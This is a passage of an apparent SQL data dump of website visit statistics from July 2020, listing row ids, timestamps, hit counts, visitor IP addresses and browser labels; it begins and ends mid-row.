,3,0,0,'66.249.70.69','chrome'),(522317,1594643042,1,1,0,0,'8.29.198.25','other'),(522318,1594643058,1,1,0,0,'8.29.198.27','other'),(522319,1594643106,1,1,0,0,'94.179.147.128','chrome'),(522320,1594643125,4,4,0,0,'66.249.70.70','chrome'),(522321,1594643184,2,2,0,0,'66.249.64.33','chrome'),(522322,1594643361,1,1,0,0,'128.124.89.162','chrome'),(522323,1594643605,1,1,0,0,'66.249.64.38','chrome'),(522324,1594644379,8,8,0,0,'185.11.82.228','other'),(522325,1594644843,2,2,0,0,'66.249.64.36','chrome'),(522326,1594645063,1,1,0,0,'17.58.99.7','other'),(522327,1594645198,3,3,0,0,'66.249.70.70','chrome'),(522328,1594645264,2,2,0,0,'66.249.64.33','chrome'),(522329,1594646183,8,8,0,0,'185.11.82.228','other'),(522330,1594646365,1,1,0,0,'66.249.70.70','chrome'),(522331,1594646768,1,1,0,0,'66.249.70.72','chrome'),(522332,1594647173,2,2,0,0,'34.212.174.239','chrome'),(522333,1594647401,1,1,0,0,'17.58.99.7','other'),(522334,1594647447,1,1,0,0,'66.249.70.69','chrome'),(522335,1594647643,1,1,0,0,'207.46.13.65','other'),(522336,1594647810,1,1,0,0,'66.249.70.70','chrome'),(522337,1594647996,8,8,0,0,'185.11.82.228','other'),(522338,1594648316,2,2,0,0,'66.249.70.72','chrome'),(522339,1594648569,1,1,0,0,'91.196.178.89','chrome'),(522340,1594648641,1,1,0,0,'66.249.64.33','chrome'),(522341,1594648693,3,3,0,0,'66.249.70.69','chrome'),(522342,1594648953,1,1,0,0,'199.244.88.132','chrome'),(522343,1594649226,1,1,0,0,'95.132.30.207','chrome'),(522344,1594649360,1,1,0,0,'66.249.70.70','chrome'),(522345,1594649953,8,8,0,0,'185.11.82.228','other'),(522346,1594650011,3,3,0,0,'66.249.70.72','chrome'),(522347,1594650111,1,1,0,0,'207.46.13.173','other'),(522348,1594650347,1,1,0,0,'194.61.24.94','other'),(522349,1594651124,1,1,0,0,'66.249.64.36','chrome'),(522350,1594651362,1,1,0,0,'207.46.13.65','other'),(522351,1594651391,3,3,0,0,'66.249.70.70','chrome'),(522352,1594651920,5,5,0,0,'66.249.70.69','chrome'),(522353,1594651964,8,8,0,0,'185.11.82.228','other'),(522354,1594653553,1,1,0,0,'66.249.70.72','chrome'),(522355,1594653865,1,1,0,0,'8.29.198.25','other'),(522356,1594653884,1,1,0,0,'8.29.198.27','other'),(522357,1594653939,8,8,0,0,'185.11.82.228','other'),(522358,1594654351,3,3,0,0,'66.249.64.33','chrome'),(522359,1594655277,1,0,1,0,'66.249.70.72',''),(522360,1594655987,8,8,0,0,'185.11.82.228','other'),(522361,1594656253,1,1,0,0,'66.249.70.70','chrome'),(522362,1594656446,1,1,0,0,'66.249.64.38','chrome'),(522363,1594657755,1,1,0,0,'17.58.99.7','other'),(522364,1594657886,2,2,0,0,'66.249.70.72','chrome'),(522365,1594658026,8,8,0,0,'185.11.82.228','other'),(522366,1594658260,3,3,0,0,'66.249.70.70','chrome'),(522367,1594658661,1,1,0,0,'66.249.70.69','chrome'),(522368,1594658930,1,1,0,0,'66.249.70.72','chrome'),(522369,1594659104,1,1,0,0,'66.249.64.38','chrome'),(522370,1594659830,3,3,0,0,'66.249.70.69','chrome'),(522371,1594660126,2,2,0,0,'66.249.64.38','chrome'),(522372,1594660144,1,1,0,0,'37.73.170.40','chrome'),(522373,1594661910,1,1,0,0,'66.249.70.69','chrome'),(522374,1594662863,1,1,0,0,'66.249.70.69','chrome'),(522375,1594663168,2,2,0,0,'66.249.70.70','chrome'),(522376,1594663490,1,1,0,0,'66.249.64.36','chrome'),(522377,1594663536,1,1,0,0,'66.249.64.38','chrome'),(522378,1594664176,1,1,0,0,'66.249.70.72','chrome'),(522379,1594664423,2,2,0,0,'66.249.70.69','chrome'),(522380,1594664447,8,8,0,0,'185.11.82.228','other'),(522381,1594664690,2,2,0,0,'8.29.198.25','other'),(522382,1594665079,1,1,0,0,'213.180.203.16','other'),(522383,1594665277,1,1,0,0,'66.249.70.70','chrome'),(522384,1594665860,1,1,0,0,'207.46.13.104','other'),(522385,1594666426,2,2,0,0,'66.249.70.72','chrome'),(522386,1594666484,8,8,0,0,'185.11.82.228','other'),(522387,1594667889,1,1,0,0,'66.249.64.33','chrome'),(522388,1594668163,1,1,0,0,'178.154.200.196','other'),(522389,1594668228,1,1,0,0,'43.239.160.150','chrome'),(522390,1594668450,1,1,0,0,'66.249.70.70','chrome'),(522391,1594668772,1,1,0,0,'66.249.70.69','chrome'),(522392,1594668854,8,8,0,0,'185.11.82.228','other'),(522393,1594669318,2,2,0,0,'66.249.64.38','chrome'),(522394,1594669534,1,1,0,0,'77.247.110.50','chrome'),(522395,1594669870,1,1,0,0,'178.154.200.97','other'),(522396,1594669945,1,1,0,0,'66.249.70.69','chrome'),(522397,1594670112,1,1,0,0,'66.249.70.70','chrome'),(522398,1594670300,1,1,0,0,'103.69.121.247','chrome'),(522399,1594670990,2,2,0,0,'66.249.70.69','chrome'),(522400,1594671099,1,1,0,0,'178.154.200.222','other'),(522401,1594671323,8,8,0,0,'185.11.82.228','other'),(522402,1594671548,1,1,0,0,'66.249.64.36','chrome'),(522403,1594671699,1,1,0,0,'66.249.70.70','chrome'),(522404,1594672231,2,2,0,0,'178.154.200.222','other'),(522405,1594672436,1,1,0,0,'66.249.64.38','chrome'),(522406,1594673018,2,2,0,0,'95.213.141.126','opera'),(522407,1594673132,1,1,0,0,'66.249.70.70','chrome'),(522408,1594673365,3,3,0,0,'66.249.70.72','chrome'),(522409,1594673490,7,7,0,0,'66.249.70.69','chrome'),(522410,1594673613,1,1,0,0,'178.154.200.97','other'),(522411,1594673648,1,1,0,0,'66.249.64.36','chrome'),(522412,1594673726,2,2,0,0,'66.249.64.33','chrome'),(522413,1594673803,8,8,0,0,'185.11.82.228','other'),(522414,1594674173,1,1,0,0,'178.154.200.222','other'),(522415,1594674236,1,1,0,0,'66.249.70.70','chrome'),(522416,1594674239,1,1,0,0,'66.249.64.38','chrome'),(522417,1594674987,1,1,0,0,'213.180.203.16','other'),(522418,1594675123,1,1,0,0,'66.249.70.72','chrome'),(522419,1594675521,1,1,0,0,'8.29.198.26','other'),(522420,1594675541,1,1,0,0,'8.29.198.25','other'),(522421,1594675789,2,2,0,0,'66.249.70.70','chrome'),(522422,1594676085,2,2,0,0,'66.249.70.72','chrome'),(522423,1594676104,1,1,0,0,'178.154.200.220','other'),(522424,1594676191,8,8,0,0,'185.11.82.228','other'),(522425,1594676230,1,1,0,0,'213.180.203.16','other'),(522426,1594676264,2,2,0,0,'178.154.200.222','other'),(522427,1594676352,1,1,0,0,'66.249.70.69','chrome'),(522428,1594677038,1,1,0,0,'66.249.70.70','chrome'),(522429,1594677238,1,1,0,0,'66.249.70.72','chrome'),(522430,1594677260,1,1,0,0,'178.154.200.222','other'),(522431,1594677491,1,1,0,0,'66.249.70.69','chrome'),(522432,1594678401,2,2,0,0,'66.249.70.69','chrome'),(522433,1594678502,1,1,0,0,'178.154.200.112','other'),(522434,1594678588,8,8,0,0,'185.11.82.228','other'),(522435,1594678832,2,2,0,0,'178.154.200.222','other'),(522436,1594679707,1,1,0,0,'66.249.70.69','chrome'),(522437,1594679831,1,1,0,0,'178.154.200.220','other'),(522438,1594681166,8,8,0,0,'185.11.82.228','other'),(522439,1594681329,1,1,0,0,'66.249.70.69','chrome'),(522440,1594681525,1,1,0,0,'213.180.203.95','other'),(522441,1594681532,1,1,0,0,'66.249.70.70','chrome'),(522442,1594681639,1,1,0,0,'178.154.200.222','other'),(522443,1594682512,1,1,0,0,'66.249.70.72','chrome'),(522444,1594682746,20,20,0,0,'216.18.204.154','firefox'),(522445,1594682784,3,3,0,0,'66.249.70.70','chrome'),(522446,1594682810,2,2,0,0,'66.249.70.69','chrome'),(522447,1594682977,1,1,0,0,'213.180.203.16','other'),(522448,1594683198,2,2,0,0,'66.249.64.33','chrome'),(522449,1594683576,8,8,0,0,'185.11.82.228','other'),(522450,1594684337,1,1,0,0,'178.154.200.222','other'),(522451,1594684390,1,1,0,0,'207.46.13.20','other'),(522452,1594684508,1,1,0,0,'62.205.134.182','other'),(522453,1594684627,2,2,0,0,'66.249.64.33','chrome'),(522454,1594684653,4,4,0,0,'66.249.70.70','chrome'),(522455,1594684689,2,2,0,0,'66.249.70.72','chrome'),(522456,1594684696,1,1,0,0,'45.8.255.11','chrome'),(522457,1594684898,1,1,0,0,'17.58.99.7','other'),(522458,1594685294,12,12,0,0,'216.18.204.154','firefox'),(522459,1594685957,1,1,0,0,'66.249.70.72','chrome'),(522460,1594686153,8,8,0,0,'185.11.82.228','other'),(522461,1594686159,1,1,0,0,'178.154.200.196','other'),(522462,1594686217,2,2,0,0,'66.249.70.69','chrome'),(522463,1594686277,1,1,0,0,'213.180.203.16','other'),(522464,1594686346,1,1,0,0,'8.29.198.25','other'),(522465,1594686367,1,1,0,0,'8.29.198.26','other'),(522466,1594686603,1,1,0,0,'213.180.203.17','other'),(522467,1594686776,1,1,0,0,'178.154.200.222','other'),(522468,1594687032,1,1,0,0,'207.46.13.104','other'),(522469,1594687268,1,1,0,0,'66.249.64.36','chrome'),(522470,1594687317,2,2,0,0,'178.154.200.236','other'),(522471,1594687912,3,3,0,0,'66.249.70.70','chrome'),(522472,1594687946,1,1,0,0,'5.255.253.82','other'),(522473,1594688441,1,1,0,0,'66.249.70.69','chrome'),(522474,1594688662,8,8,0,0,'185.11.82.228','other'),(522475,1594688896,1,1,0,0,'46.53.246.240','chrome'),(522476,1594688904,1,1,0,0,'213.180.203.122','other'),(522477,1594688993,2,2,0,0,'66.249.70.72','chrome'),(522478,1594689683,1,1,0,0,'207.46.13.173','other'),(522479,1594689807,1,1,0,0,'66.249.70.70','chrome'),(522480,1594689991,1,1,0,0,'66.249.70.69','chrome'),(522481,1594690809,2,2,0,0,'66.249.70.72','chrome'),(522482,1594690994,1,1,0,0,'66.249.70.69','chrome'),(522483,1594691164,1,1,0,0,'66.249.70.70','chrome'),(522484,1594691261,8,8,0,0,'185.11.82.228','other'),(522485,1594691398,1,1,0,0,'66.249.64.36','chrome'),(522486,1594692780,1,1,0,0,'213.180.203.16','other'),(522487,1594693286,1,1,0,0,'66.249.70.69','chrome'),(522488,1594693800,8,8,0,0,'185.11.82.228','other'),(522489,1594694269,1,1,0,0,'207.46.13.20','other'),(522490,1594694969,1,1,0,0,'66.249.64.38','chrome'),(522491,1594695077,2,2,0,0,'178.154.200.220','other'),(522492,1594696389,8,8,0,0,'185.11.82.228','other'),(522493,1594696735,3,3,0,0,'66.249.70.69','chrome'),(522494,1594697173,2,2,0,0,'8.29.198.27','other'),(522495,1594697211,2,2,0,0,'178.154.200.222','other'),(522496,1594697481,1,1,0,0,'213.180.203.16','other'),(522497,1594697493,1,1,0,0,'207.46.13.104','other'),(522498,1594698657,1,1,0,0,'66.249.70.69','chrome'),(522499,1594698983,8,8,0,0,'185.11.82.228','other'),(522500,1594699819,2,2,0,0,'178.154.200.222','other'),(522501,1594700434,1,1,0,0,'66.249.70.70','chrome'),(522502,1594700523,1,1,0,0,'66.249.64.36','chrome'),(522503,1594700571,1,1,0,0,'193.58.104.164','chrome'),(522504,1594700999,1,1,0,0,'213.180.203.16','other'),(522505,1594701052,1,1,0,0,'178.154.200.222','other'),(522506,1594701071,1,1,0,0,'131.220.6.152','chrome'),(522507,1594701240,1,1,0,0,'207.46.13.173','other'),(522508,1594701312,1,1,0,0,'178.154.200.220','other'),(522509,1594701634,8,8,0,0,'185.11.82.228','other'),(522510,1594701799,1,1,0,0,'5.45.207.162','other'),(522511,1594702104,1,1,0,0,'213.184.248.225','chrome'),(522512,1594702389,1,1,0,0,'62.205.134.182','other'),(522513,1594702431,1,1,0,0,'66.249.64.36','chrome'),(522514,1594702467,1,1,0,0,'66.249.70.72','chrome'),(522515,1594702476,1,1,0,0,'59.153.145.219','chrome'),(522516,1594702732,1,1,0,0,'213.180.203.95','other'),(522517,1594702735,1,1,0,0,'178.154.200.222','other'),(522518,1594702962,1,1,0,0,'207.46.13.173','other'),(522519,1594703492,1,1,0,0,'66.249.64.36','chrome'),(522520,1594703643,1,1,0,0,'66.249.70.70','chrome'),(522521,1594704076,1,1,0,0,'207.46.13.20','other'),(522522,1594704224,1,1,0,0,'178.154.200.51','other'),(522523,1594704393,8,8,0,0,'185.11.82.228','other'),(522524,1594704468,1,1,0,0,'66.249.70.69','chrome'),(522525,1594705669,1,1,0,0,'207.46.13.20','other'),(522526,1594705877,1,1,0,0,'66.249.70.70','chrome'),(522527,1594705916,1,1,0,0,'37.73.16.40','chrome'),(522528,1594707033,1,1,0,0,'91.196.178.89','chrome'),(522529,1594707268,1,1,0,0,'37.73.16.40','chrome'),(522530,1594707468,1,1,0,0,'178.154.200.222','other'),(522531,1594707587,8,8,0,0,'185.11.82.228','other'),(522532,1594707613,1,1,0,0,'213.180.203.16','other'),(522533,1594707997,2,2,0,0,'8.29.198.25','other'),(522534,1594708149,1,1,0,0,'178.154.200.191','other'),(522535,1594708197,1,1,0,0,'91.196.178.86','chrome'),(522536,1594708537,1,1,0,0,'207.46.13.20','other'),(522537,1594709251,1,1,0,0,'66.249.64.33','chrome'),(522538,1594710117,1,1,0,0,'178.154.200.222','other'),(522539,1594710131,1,1,0,0,'66.249.70.72','chrome'),(522540,1594710209,1,1,0,0,'213.180.203.16','other'),(522541,1594710382,1,1,0,0,'207.46.13.173','other'),(522542,1594711035,1,1,0,0,'178.154.200.196','other'),(522543,1594711191,8,8,0,0,'185.11.82.228','other'),(522544,1594711565,2,2,0,0,'178.154.200.222','other'),(522545,1594712090,1,1,0,0,'178.154.200.236','other'),(522546,1594712860,1,1,0,0,'207.46.13.173','other'),(522547,1594713070,1,1,0,0,'213.180.203.16','other'),(522548,1594714041,1,1,0,0,'66.249.70.72','chrome'),(522549,1594714187,2,2,0,0,'178.154.200.222','other'),(522550,1594715033,1,1,0,0,'91.196.178.169','chrome'),(522551,1594715048,8,8,0,0,'185.11.82.228','other'),(522552,1594717000,1,1,0,0,'37.143.63.40','chrome'),(522553,1594717054,1,1,0,0,'66.249.70.72','chrome'),(522554,1594717115,1,1,0,0,'178.154.200.196','other'),(522555,1594717230,1,1,0,0,'178.154.200.220','other'),(522556,1594717533,1,1,0,0,'66.249.70.70','chrome'),(522557,1594717867,1,1,0,0,'93.77.101.184','firefox'),(522558,1594718035,1,1,0,0,'207.46.13.104','other'),(522559,1594718079,1,1,0,0,'66.249.64.33','chrome'),(522560,1594718498,1,1,0,0,'212.1.124.210','chrome'),(522561,1594718823,2,2,0,0,'8.29.198.25','other'),(522562,1594719077,8,8,0,0,'185.11.82.228','other'),(522563,1594719280,1,1,0,0,'213.180.203.95','other'),(522564,1594719658,1,1,0,0,'66.249.64.38','chrome'),(522565,1594720302,1,1,0,0,'213.180.203.95','other'),(522566,1594720329,1,1,0,0,'66.249.70.72','chrome'),(522567,1594720363,1,1,0,0,'18.221.42.89','chrome'),(522568,1594720680,1,1,0,0,'66.249.64.33','chrome'),(522569,1594720828,1,1,0,0,'66.249.70.70','chrome'),(522570,1594721132,1,1,0,0,'91.196.178.129','chrome'),(522571,1594722202,2,2,0,0,'66.249.70.70','chrome'),(522572,1594723390,1,1,0,0,'207.46.13.104','other'),(522573,1594723487,8,8,0,0,'185.11.82.228','other'),(522574,1594723683,1,1,0,0,'66.249.70.72','chrome'),(522575,1594723877,2,1,1,0,'66.249.70.70',''),(522576,1594724028,3,3,0,0,'66.249.70.69','chrome'),(522577,1594724597,1,1,0,0,'45.133.170.47','chrome'),(522578,1594724729,1,1,0,0,'37.113.180.29','chrome'),(522579,1594724770,1,1,0,0,'66.249.64.38','chrome'),(522580,1594725051,1,1,0,0,'194.61.24.94','other'),(522581,1594725500,1,1,0,0,'109.74.154.72','chrome'),(522582,1594725630,1,1,0,0,'66.249.64.33','chrome'),(522583,1594725897,1,1,0,0,'66.249.64.38','chrome'),(522584,1594726213,2,2,0,0,'66.249.70.70','chrome'),(522585,1594727050,2,2,0,0,'66.249.70.69','chrome'),(522586,1594727381,1,1,0,0,'91.196.178.166','other'),(522587,1594727441,3,3,0,0,'66.249.70.72','chrome'),(522588,1594728030,8,8,0,0,'185.11.82.228','other'),(522589,1594728134,2,2,0,0,'66.249.70.70','chrome'),(522590,1594728170,2,2,0,0,'66.249.70.69','chrome'),(522591,1594728614,2,2,0,0,'66.249.70.72','chrome'),(522592,1594728693,1,1,0,0,'17.58.99.7','other'),(522593,1594729116,1,1,0,0,'66.249.64.36','chrome'),(522594,1594729396,3,3,0,0,'66.249.70.69','chrome'),(522595,1594729645,1,1,0,0,'8.29.198.25','other'),(522596,1594729699,1,1,0,0,'8.29.198.27','other'),(522597,1594729872,6,6,0,0,'66.249.70.70','chrome'),(522598,1594730138,2,2,0,0,'66.249.70.72','chrome'),(522599,1594730605,3,3,0,0,'66.249.70.69','chrome'),(522600,1594731035,2,2,0,0,'66.249.64.38','chrome'),(522601,1594731055,1,1,0,0,'66.249.64.33','chrome'),(522602,1594731285,6,6,0,0,'66.249.70.70','chrome'),(522603,1594731344,2,2,0,0,'66.249.70.72','chrome'),(522604,1594731613,1,1,0,0,'102.165.5.35','chrome'),(522605,1594731770,1,1,0,0,'95.67.72.58','chrome'),(522606,1594731833,6,6,0,0,'66.249.70.69','chrome'),(522607,1594732405,2,2,0,0,'66.249.70.72','chrome'),(522608,1594732871,3,3,0,0,'66.249.70.70','chrome'),(522609,1594732926,8,8,0,0,'185.11.82.228','other'),(522610,1594733298,1,1,0,0,'66.249.64.33','chrome'),(522611,1594733364,5,5,0,0,'66.249.70.72','chrome'),(522612,1594733434,1,1,0,0,'91.196.178.169','chrome'),(522613,1594733532,3,3,0,0,'66.249.70.69','chrome'),(522614,1594733833,2,2,0,0,'91.209.11.236','other'),(522615,1594733906,1,1,0,0,'207.46.13.104','other'),(522616,1594734057,1,1,0,0,'66.249.64.36','chrome'),(522617,1594734082,1,1,0,0,'209.17.96.202','other'),(522618,1594734087,1,1,0,0,'66.249.70.70','chrome'),(522619,1594734463,1,1,0,0,'176.111.33.18','firefox'),(522620,1594735043,2,2,0,0,'66.249.70.69','chrome'),(522621,1594735122,1,1,0,0,'17.58.99.7','other'),(522622,1594735210,3,3,0,0,'66.249.70.70','chrome'),(522623,1594735342,1,1,0,0,'66.249.64.36','chrome'),(522624,1594735513,1,1,0,0,'66.249.70.72','chrome'),(522625,1594736246,1,1,0,0,'66.249.64.38','chrome'),(522626,1594736272,1,1,0,0,'66.249.70.69','chrome'),(522627,1594736396,1,1,0,0,'66.249.64.33','chrome'),(522628,1594736662,2,2,0,0,'207.46.13.104','other'),(522629,1594736955,1,1,0,0,'66.249.70.70','chrome'),(522630,1594737129,1,1,0,0,'66.249.64.36','chrome'),(522631,1594737375,2,2,0,0,'66.249.70.69','chrome'),(522632,1594737761,8,8,0,0,'185.11.82.228','other'),(522633,1594737793,3,3,0,0,'66.249.70.72','chrome'),(522634,1594738138,2,2,0,0,'66.249.64.33','chrome'),(522635,1594738190,1,1,0,0,'66.249.64.38','chrome'),(522636,1594738331,5,5,0,0,'66.249.70.70','chrome'),(522637,1594738558,2,2,0,0,'66.249.64.36','chrome'),(522638,1594738755,2,2,0,0,'66.249.70.72','chrome'),(522639,1594739202,2,2,0,0,'66.249.70.69','chrome'),(522640,1594739816,1,1,0,0,'66.249.64.36','chrome'),(522641,1594740171,2,2,0,0,'66.249.70.70','chrome'),(522642,1594740286,3,3,0,0,'66.249.70.72','chrome'),(522643,1594740468,1,1,0,0,'8.29.198.27','other'),(522644,1594740500,2,2,0,0,'66.249.64.33','chrome'),(522645,1594740531,1,1,0,0,'8.29.198.25','other'),(522646,1594740586,1,1,0,0,'207.46.13.173','other'),(522647,1594740680,2,2,0,0,'66.249.70.69','chrome'),(522648,1594741277,1,1,0,0,'217.171.147.164','chrome'),(522649,1594741654,1,1,0,0,'69.171.251.8','other'),(522650,1594741784,2,2,0,0,'66.249.70.72','chrome'),(522651,1594742053,4,4,0,0,'66.249.70.70','chrome'),(522652,1594742176,27,27,0,0,'216.18.204.154','firefox'),(522653,1594742486,8,8,0,0,'185.11.82.228','other'),(522654,1594742520,1,1,0,0,'94.153.29.60','chrome'),(522655,1594742743,2,2,0,0,'66.249.70.69','chrome'),(522656,1594743128,2,2,0,0,'66.249.70.72','chrome'),(522657,1594743192,1,1,0,0,'193.58.104.173','chrome'),(522658,1594743232,1,1,0,0,'141.98.102.172','msie'),(522659,1594743445,1,1,0,0,'207.46.13.104','other'),(522660,1594743513,1,1,0,0,'31.13.103.17','other'),(522661,1594743663,4,4,0,0,'66.249.70.69','chrome'),(522662,1594743703,3,3,0,0,'66.249.70.70','chrome'),(522663,1594743706,22,22,0,0,'216.18.204.154','firefox'),(522664,1594744087,2,2,0,0,'66.249.70.72','chrome'),(522665,1594744271,1,1,0,0,'3.250.120.173','chrome'),(522666,1594744636,1,1,0,0,'66.249.64.33','chrome'),(522667,1594745225,27,27,0,0,'216.18.204.154','firefox'),(522668,1594746128,6,6,0,0,'216.18.204.154','firefox'),(522669,1594746288,2,2,0,0,'66.249.70.70','chrome'),(522670,1594746324,2,2,0,0,'66.249.70.72','chrome'),(522671,1594746557,1,1,0,0,'66.249.64.38','chrome'),(522672,1594746909,3,3,0,0,'66.249.70.69','chrome'),(522673,1594747392,20,20,0,0,'216.18.204.154','firefox'),(522674,1594747415,1,1,0,0,'77.74.177.113','chrome'),(522675,1594747448,8,8,0,0,'185.11.82.228','other'),(522676,1594747892,2,2,0,0,'66.249.70.69','chrome'),(522677,1594748019,1,1,0,0,'66.249.70.72','chrome'),(522678,1594748479,1,1,0,0,'178.154.200.110','other'),(522679,1594748662,20,20,0,0,'216.18.204.154','firefox'),(522680,1594749202,5,5,0,0,'66.249.70.69','chrome'),(522681,1594749975,20,20,0,0,'216.18.204.154','firefox'),(522682,1594750008,3,3,0,0,'66.249.70.70','chrome'),(522683,1594750285,1,0,1,0,'66.249.70.72',''),(522684,1594750513,4,4,0,0,'66.249.70.72','chrome'),(522685,1594750898,1,1,0,0,'157.55.39.3','other'),(522686,1594751035,1,1,0,0,'45.8.255.196','chrome'),(522687,1594751200,3,3,0,0,'66.249.64.36','chrome'),(522688,1594751238,20,20,0,0,'216.18.204.154','firefox'),(522689,1594751291,2,2,0,0,'8.29.198.27','other'),(522690,1594751419,1,1,0,0,'66.249.70.72','chrome'),(522691,1594751505,2,2,0,0,'66.249.64.33','chrome'),(522692,1594751528,3,3,0,0,'66.249.70.70','chrome'),(522693,1594751531,1,1,0,0,'66.249.70.69','chrome'),(522694,1594752365,21,21,0,0,'216.18.204.154','firefox'),(522695,1594752691,2,2,0,0,'66.249.70.72','chrome'),(522696,1594752777,1,1,0,0,'13.90.43.203','chrome'),(522697,1594753093,1,1,0,0,'213.180.203.109','other'),(522698,1594753368,1,1,0,0,'66.249.70.69','chrome'),(522699,1594753494,20,20,0,0,'216.18.204.154','firefox'),(522700,1594754108,1,1,0,0,'66.249.70.72','chrome'),(522701,1594754261,1,1,0,0,'66.249.70.70','chrome'),(522702,1594754393,2,2,0,0,'66.249.70.69','chrome'),(522703,1594754622,21,21,0,0,'216.18.204.154','firefox'),(522704,1594754827,8,8,0,0,'185.11.82.228','other'),(522705,1594755175,1,1,0,0,'66.249.70.70','chrome'),(522706,1594755356,1,1,0,0,'188.42.35.208','chrome'),(522707,1594755411,1,1,0,0,'213.180.203.122','other'),(522708,1594755580,20,20,0,0,'216.18.204.154','firefox'),(522709,1594756587,20,20,0,0,'216.18.204.154','firefox'),(522710,1594756621,2,2,0,0,'66.249.70.70','chrome'),(522711,1594756784,1,1,0,0,'66.249.64.33','chrome'),(522712,1594757267,2,2,0,0,'66.249.70.72','chrome'),(522713,1594757587,20,20,0,0,'216.18.204.154','firefox'),(522714,1594757707,1,1,0,0,'66.249.70.69','chrome'),(522715,1594757851,1,1,0,0,'37.73.189.61','chrome'),(522716,1594758337,1,1,0,0,'207.46.13.20','other'),(522717,1594758540,20,20,0,0,'216.18.204.154','firefox'),(522718,1594758706,1,1,0,0,'66.249.70.72','chrome'),(522719,1594758716,2,2,0,0,'66.249.70.70','chrome'),(522720,1594758896,2,2,0,0,'207.46.13.104','other'),(522721,1594759534,21,21,0,0,'216.18.204.154','firefox'),(522722,1594760388,2,2,0,0,'66.249.64.33','chrome'),(522723,1594760467,24,24,0,0,'216.18.204.154','firefox'),(522724,1594760477,2,2,0,0,'66.249.70.70','chrome'),(522725,1594760654,2,2,0,0,'66.249.70.72','chrome'),(522726,1594760871,1,1,0,0,'66.249.70.69','chrome'),(522727,1594761272,1,1,0,0,'66.249.64.38','chrome'),(522728,1594761371,15,15,0,0,'216.18.204.154','firefox'),(522729,1594761571,1,1,0,0,'66.249.64.33','chrome'),(522730,1594761638,1,1,0,0,'94.153.77.69','chrome'),(522731,1594761663,2,2,0,0,'66.249.70.70','chrome'),(522732,1594762118,1,1,0,0,'8.29.198.27','other'),(522733,1594762186,1,1,0,0,'8.29.198.25','other'),(522734,1594762353,20,20,0,0,'216.18.204.154','firefox'),(522735,1594763083,1,1,0,0,'207.46.13.20','other'),(522736,1594763327,20,20,0,0,'216.18.204.154','firefox'),(522737,1594763335,3,3,0,0,'66.249.70.69','chrome'),(522738,1594763406,1,1,0,0,'66.249.64.33','chrome'),(522739,1594763545,1,1,0,0,'66.249.70.72','chrome'),(522740,1594763769,1,1,0,0,'207.46.13.104','other'),(522741,1594763857,2,2,0,0,'66.249.70.70','chrome'),(522742,1594764238,1,1,0,0,'66.249.64.36','chrome'),(522743,1594764368,21,21,0,0,'216.18.204.154','firefox'),(522744,1594764391,1,1,0,0,'66.249.64.33','chrome'),(522745,1594764870,1,1,0,0,'66.249.70.69','chrome'),(522746,1594764909,1,1,0,0,'66.249.70.72','chrome'),(522747,1594765477,1,1,0,0,'66.249.64.33','chrome'),(522748,1594765820,20,20,0,0,'216.18.204.154','firefox'),(522749,1594765953,2,2,0,0,'66.249.70.70','chrome'),(522750,1594766385,8,8,0,0,'185.11.82.228','other'),(522751,1594766879,20,20,0,0,'216.18.204.154','firefox'),(522752,1594767235,1,1,0,0,'66.249.70.69','chrome'),(522753,1594767597,2,2,0,0,'66.249.70.72','chrome'),(522754,1594767675,1,1,0,0,'66.249.64.36','chrome'),(522755,1594767678,1,1,0,0,'66.249.64.38','chrome'),(522756,1594767842,1,1,0,0,'66.249.64.33','chrome'),(522757,1594768039,1,1,0,0,'59.153.145.122','chrome'),(522758,1594768987,1,1,0,0,'207.46.13.104','other'),(522759,1594769321,1,1,0,0,'66.249.70.69','chrome'),(522760,1594769619,1,1,0,0,'66.249.70.70','chrome'),(522761,1594769837,90,90,0,0,'54.234.235.34','other'),(522762,1594770640,1,1,0,0,'17.58.99.7','other'),(522763,1594770654,1,1,0,0,'66.249.70.70','chrome'),(522764,1594770738,90,90,0,0,'54.234.235.34','other'),(522765,1594770909,1,1,0,0,'62.205.134.182','other'),(522766,1594771640,90,90,0,0,'54.234.235.34','other'),(522767,1594771830,1,1,0,0,'17.58.99.7','other'),(522768,1594772287,7,7,0,0,'66.249.70.69','chrome'),(522769,1594772549,90,90,0,0,'54.234.235.34','other'),(522770,1594772587,5,5,0,0,'66.249.70.70','chrome'),(522771,1594772942,1,1,0,0,'8.29.198.25','other'),(522772,1594773018,1,1,0,0,'8.29.198.27','other'),(522773,1594773300,1,1,0,0,'66.249.64.38','chrome'),(522774,1594773459,90,90,0,0,'54.234.235.34','other'),(522775,1594773483,2,2,0,0,'66.249.70.72','chrome'),(522776,1594773724,1,1,0,0,'17.58.99.7','other'),(522777,1594774321,1,1,0,0,'66.249.64.36','chrome'),(522778,1594774362,88,88,0,0,'54.234.235.34','other'),(522779,1594774393,1,1,0,0,'207.46.13.104','other'),(522780,1594774788,6,6,0,0,'66.249.70.69','chrome'),(522781,1594774800,2,2,0,0,'66.249.70.72','chrome'),(522782,1594774813,2,2,0,0,'66.249.70.70','chrome'),(522783,1594775269,91,91,0,0,'54.234.235.34','other'),(522784,1594775386,1,1,0,0,'207.46.13.104','other'),(522785,1594775512,1,1,0,0,'209.17.97.42','other'),(522786,1594775915,1,1,0,0,'34.223.60.1','chrome'),(522787,1594776170,93,93,0,0,'54.234.235.34','other'),(522788,1594776207,1,1,0,0,'66.249.70.72','chrome'),(522789,1594777032,1,1,0,0,'207.46.13.20','other'),(522790,1594777081,93,93,0,0,'54.234.235.34','other'),(522791,1594777583,2,2,0,0,'17.58.99.7','other'),(522792,1594777614,1,1,0,0,'66.249.70.69','chrome'),(522793,1594777888,1,1,0,0,'66.249.70.70','chrome'),(522794,1594777988,88,88,0,0,'54.234.235.34','other'),(522795,1594778033,1,1,0,0,'66.249.64.33','chrome'),(522796,1594778527,1,1,0,0,'66.249.64.36','chrome'),(522797,1594778865,1,1,0,0,'39.101.129.127','other'),(522798,1594778891,5,5,0,0,'54.234.235.34','other'),(522799,1594779820,1,1,0,0,'66.249.64.33','chrome'),(522800,1594779912,1,1,0,0,'66.249.64.38','chrome'),(522801,1594781088,1,1,0,0,'207.46.13.104','other'),(522802,1594782113,1,1,0,0,'66.249.70.69','chrome'),(522803,1594782402,1,1,0,0,'66.249.70.70','chrome'),(522804,1594783766,2,2,0,0,'8.29.198.27','other'),(522805,1594783927,1,1,0,0,'62.149.15.172','chrome'),(522806,1594784029,1,1,0,0,'66.249.70.69','chrome'),(522807,1594785079,1,0,1,0,'66.249.70.70',''),(522808,1594785303,1,1,0,0,'66.249.70.69','chrome'),(522809,1594785452,8,8,0,0,'185.11.82.228','other'),(522810,1594785590,1,1,0,0,'193.58.104.164','chrome'),(522811,1594786416,1,1,0,0,'157.55.39.137','other'),(522812,1594786587,1